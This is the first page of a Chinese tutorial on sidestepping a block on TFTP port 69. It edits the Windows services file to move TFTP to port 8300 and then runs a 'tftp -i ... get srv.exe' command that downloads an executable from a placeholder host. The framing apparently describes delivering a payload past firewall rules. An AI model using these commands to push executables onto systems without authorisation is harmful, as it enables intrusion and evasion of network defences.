下一页 1 2 3
一,TFTP+自定义端口
限制用TFTP传送文件,一般就是直接封69端口,我们在用TFTP传送
文件的时候,一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载,TFTP默认的是69端口,那么怎么才能改这个端口了?TFTPD32.exe等TFTP服务端是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次TFTP服务端。至于客户端
在system32\drivers\etc\文件夹下有一个services文件。打开如下:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# / [aliases...]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
...
tftp 69/udp #Trivial File Transfer
...
不难看出,69/udp就是定义tftp默认端口的,协议为udp。
好啦!具体怎么用只要这两句,其实就是比原来多加了一句改端口的:
echo tftp 8300/udp > %systemroot%\system32\drivers\etc\services
tftp -i xxx.xxx.xxx.xxx get srv.exe
注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。
安全点的做法:
ren %systemroot%\system32\drivers\etc\services 1
echo tftp 8300/udp >2
copy 2+%systemroot%\system32\drivers\etc\1 %systemroot%\system32\drivers\etc
\services
文章来源于领测软件测试网 https://www.ltesting.net/
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073